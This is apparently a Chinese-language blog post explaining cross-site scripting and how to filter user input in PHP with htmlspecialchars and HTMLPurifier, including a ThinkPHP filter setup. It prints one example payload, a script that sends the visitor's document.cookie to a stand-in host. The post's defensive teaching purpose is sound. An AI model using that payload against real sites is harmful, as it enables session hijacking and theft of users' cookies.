PHP预防跨站脚本(XSS)攻击且不影响html代码显示效果

什么是XSS

跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

XSS(跨站脚本攻击)两种形式:输入JS代码或者HTML代码导致页面乱。

几乎所有的网站都有可能会遭遇XSS攻击,它和sql漏洞注入一样,也是web应用经常会考虑到的安全问题之一。XSS被应用在有通过表单提交数据的地方例如评论,注册,信息录入等。如果攻击者输入了不合法内容(比如一段js代码),而且我们队输入没有过滤和转义,跨站脚本漏洞就产生了

如果攻击者在评论区插入了以下代码:

<script>
  document.location =
    'http://www.example.com/xxxx.php?cookies=' +
    document.cookie
</script>

而你没有过滤掉或转义的话,那么你的用户将会把他们的coockie发送的攻击者指定的脚本中。这是极其危险的。

如何避免XSS攻击

其实XSS跨站脚本攻击是很容易避免的。

  • 最常见的方法是使用htmlspecialchar() 方法过滤信息。
    但是使用htmlspecialchar()过滤后会使有些需要显示的Html效果被屏蔽掉比如:
    image

那么我们可以使用一个开源的XSS过滤包htmlpurifier来过滤并且保留我们要展示的html内容

首先我们下载htmlpurifier包并将其放入项目中,一般我们只需要如下一行代码引入就可以调用其方法。

require_once '/path/to/HTMLPurifier.auto.php';
$config = HTMLPurifier_Config::createDefault();
$purifier = new HTMLPurifier($config);
$html = $purifier->purify($html);

在THINKPHP中使用htmlpurifier

  • 而在thinkphp中,我们通过配置将I方法的默认方法由htmlspecialchar改为使用htmlpurifier。这样使用更加方便。
    首先下载包并将其放入tp的vendor文件夹下。在function.php中定义函数
function removeXSS($data){
	static $purifier;
	if($purifier === NULL){
		vendor('htmlpurifier.library.HTMLPurifier#auto');//引入
		$config = HTMLPurifier_Config::createDefault();
		$purifier = new HTMLPurifier($config);
	}
	return $purifier->purify($data);

Conf文件夹下的config.php中定义了I函数默认的参数过滤方法。
image

我们将其修改为我们自定义的函数,这样就可以在使用I方法的时候实现自定义的动态过滤
代码如下

    'DEFAULT_FILTER' => 'trim,removeXSS',

posted @ 2017-08-14 17:49  augur_g  阅读(1318)  评论(0编辑  收藏  举报